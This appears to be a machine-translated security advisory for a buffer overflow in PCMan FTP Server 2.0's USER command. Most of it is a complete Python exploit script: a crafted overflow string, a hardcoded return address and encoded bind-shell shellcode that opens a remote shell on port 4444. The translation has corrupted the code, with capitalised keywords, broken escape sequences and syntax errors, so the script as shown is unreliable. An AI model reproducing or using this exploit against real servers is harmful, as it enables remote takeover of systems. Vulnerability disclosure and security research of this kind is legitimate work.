Release date:
Updated on: 2013-07-02
Affected Systems:
PCMan FTP Server 2.0
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60837
The PCMan FTP Server is an FTP Server software.
The implementation of PCMan FTP Server 2.0 has a security vulnerability that allows remote attackers to execute arbitrary code in the context of the affected application.
<* Source: Jacob Holcomb
Link: http://packetstormsecurity.com/files/122173/PCMans-FTP-Server-2.0-Directory-Traversal.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/env python
Import signal
From time import sleep
From socket import *
From sys import exit, exc_info
Def sigHandle (signum, frm): # Signal handler
Print "\ n [!] Cleaning up the exploit... [!] \ N"
Sleep (1)
Exit (0)
Def targServer ():
While True:
Try:
Server = inet_aton (raw_input ("\ n [*] Please enter the IPv4
Address of the PCMan FTP Server: \ n> "))
Server = inet_ntoa (server)
Break
Except t:
Print "\ n [!] Error: Please enter a valid IPv4 address.
[!] \ N"
Sleep (1)
Continue
Return server
Def main ():
Print ("" \ n [*] Title ************************** PCMan FTP Server
V2.0.7 Remote Root Shell Exploit-USER Command
[*] Discovered and Reported ***** June 2013
[*] Discovered/Exploited By ****** Jacob Holcomb/Gimppy, Security Analyst
@ Independent Security Evaluators
[*] Exploit/Advisory ************** http://infosec42.blogspot.com/
[*] Software ********************** PCMan FTP Server v2.0.7 (Listens on
TCP/21)
[*] Tested Commands *************** USER (Other commands were not tested
And may be vulnerable)
[*] CVE ************************** PCMan FTP Server v2.0.7 Buffer
Overflow: Pending """)
Signal. signal (signal. SIGINT, sigHandle) # Setting signal handler
Ctrl + c
Victim = targServer ()
Port = int (21)
Cmd = "USER" # Vulnerable command
JuNk = "\ x42" * 2004
# KERNEL32.dll 7CA58265-JMP ESP
Ret = "\ x65 \ x82 \ xA5 \ x7C"
NOP = "\ x90" * 50
#348 Bytes Bind Shell Port TCP/4444
# Msfpayload windows/shell_bind_tcp EXITFUNC = thread LPORT = 4444 R |
# Msfencode-e x86/shikata_ga_nai-c 1-B "\ x0d \ x0a \ x00 \ xf1" R
Shellcode =
"\ Xdb \ xcc \ xba \ x40 \ xb6 \ x7d \ xba \ xd9 \ x74 \ x24 \ xf4 \ x58 \ x29 \ xc9"
Shellcode + =
"\ Xb1 \ x50 \ x31 \ x50 \ x18 \ x03 \ x50 \ x18 \ x83 \ xe8 \ xbc \ x54 \ x88 \ x46"
Shellcode + =
"\ X56 \ x72 \ x3e \ x5f \ x5f \ x7b \ x3e \ x60 \ xff \ x0f \ xad \ xbb \ xdb \ x84"
Shellcode + =
"\ X6b \ xf8 \ xa8 \ xe7 \ x76 \ x78 \ xaf \ xf8 \ xf2 \ x37 \ xb7 \ x8d \ x5a \ xe8"
Shellcode + =
"\ Xc6 \ x7a \ x2d \ x63 \ xfc \ xf7 \ xaf \ x9d \ xcd \ xc7 \ x29 \ xcd \ xa9 \ x08"
Shellcode + =
"\ X3d \ x09 \ x42 \ xb3 \ x14 \ xb0 \ xb8 \ x38 \ x2d \ x60 \ x1b \ xe9 \ x27"
Shellcode + =
"\ X6d \ xe8 \ xb6 \ xe3 \ x6c \ x04 \ x2e \ x67 \ x62 \ x91 \ x24 \ x28 \ x66 \ x24"
Shellcode + =
"\ Xd0 \ xd4 \ xba \ xad \ xaf \ xb7 \ xe6 \ xad \ xce \ x84 \ xd7 \ x16 \ x74 \ x80"
Shellcode + =
"\ X54 \ x99 \ xfe \ xd6 \ x56 \ x52 \ xcb \ xef \ x31 \ xfb \ x4d \ x98"
Shellcode + =
"\ X3f \ xb5 \ x7f \ xb4 \ x10 \ xb5 \ xa9 \ x22 \ xc2 \ x2f \ x3d \ x98 \ xd6 \ xc7"
Shellcode + =
"\ Xca \ xad \ x24 \ x47 \ x60 \ xad \ x99 \ x1f \ x43 \ xbc \ xe6 \ xdb \ x03 \ xc0"
Shellcode + =
"\ Xc1 \ x43 \ x2a \ xdb \ x88 \ xfa \ xc1 \ x2c \ x57 \ xa8 \ x73 \ x2f \ xa8 \ x82"
Shellcode + =
"\ Xeb \ xf6 \ x5f \ xd6 \ x46 \ x5f \ x9f \ xce \ xcb \ x33 \ x0c \ xbc \ xb8 \ xf0"
Shellcode + =
"\ Xe1 \ x01 \ x6d \ x08 \ xd5 \ xe0 \ xf9 \ xe7 \ x8a \ x8a \ xaa \ x8e \ xd2 \ xc6"
Shellcode + =
"\ X24 \ x35 \ x0e \ x99 \ x73 \ x62 \ xd0 \ x8f \ x11 \ x9d \ x7f \ x65 \ x1a \ x4d"
Shellcode + =
"\ X17 \ x21 \ x49 \ x40 \ x01 \ x7e \ x6e \ x4b \ x82 \ xd4 \ x6f \ xa4 \ x4d \ x32"
Shellcode + =
"\ Xc6 \ xc3 \ xc7 \ xeb \ x27 \ x1d \ x87 \ x47 \ x83 \ xf7 \ xd7 \ xb8 \ xb8 \ x90"
Shellcode + =
"\ Xc0 \ x40 \ x78 \ x19 \ x58 \ x4c \ x52 \ x8f \ x99 \ x62 \ x3c \ x5a \ x02 \ xe5"
Shellcode + =
"\ Xa8 \ xf9 \ xa7 \ x60 \ xcd \ x94 \ x67 \ x2a \ x24 \ xa5 \ x01 \ x2b \ x5c \ x71"
Shellcode + =
"\ X9b \ x56 \ x91 \ xb9 \ x68 \ x3c \ x2f \ x7b \ xa2 \ xbf \ x8d \ x50 \ x2f \ xb2"
Shellcode + =
"\ X6b \ x91 \ xe4 \ x66 \ x20 \ x89 \ x88 \ x86 \ x85 \ x5c \ x92 \ x02 \ xad \ x9f"
Shellcode + =
"\ Xba \ xb6 \ x7a \ x32 \ x12 \ x18 \ xd5 \ xd8 \ x95 \ xcb \ x84 \ x49 \ xc7 \ x14"
Shellcode + =
"\ Xf6 \ x1a \ x4a \ x33 \ xf3 \ x14 \ xc7 \ x3b \ x2d \ xc2 \ x17 \ x3c \ xe6 \ xec"
Shellcode + =
"\ X38 \ x48 \ x5f \ xef \ x3a \ x8b \ x3b \ xf0 \ xeb \ x46 \ x3c \ xde \ x7c \ x88"
Shellcode + = "\ x0c \ x3f \ x1c \ x05 \ x6f \ x16 \ x22 \ x79"
Sploit = Cmd + JuNk + ret + NOP + shellcode
Sploit + = "\ x42" * (2992-len (NOP + shellcode) + "\ r \ n"
Try:
Print "\ n [*] Creating network socket ."
Net_sock = socket (AF_INET, SOCK_STREAM)
Except t:
Print "\ n [!] There was an error creating the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)
Try:
Print "[*] Connecting to PCMan FTP Server @ % s on port TCP/% d ."
% (Victim, port)
Net_sock.connect (victim, port ))
Except t:
Print "\ n [!] There was an error connecting to % s.
[!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)
Try:
Print "[*] Attempting to exploit the ftp user command.
[*] Sending 1337 ro0t Sh3ll exploit to % s on TCP port % d.
[*] Payload Length: % d bytes. "" % (victim, port, len (sploit ))
Net_sock.send (sploit)
Sleep (1)
Except t:
Print "\ n [!] There was an error sending the 1337 ro0t Sh3ll
Exploit to % s [!] \ N % s \ n "% (victim, exc_info ())
Sleep (1)
Exit (0)
Try:
Print "[*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed
For code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit
Cleanup. \ n """
Net_sock.close ()
Except t:
Print "\ n [!] There was an error closing the network socket.
[!] \ N % s \ n "% exc_info ()
Sleep (1)
Exit (0)
If _ name _ = "_ main __":
Main ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PCMan
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Https://files.secureserver.net/1sMltFOsytirTG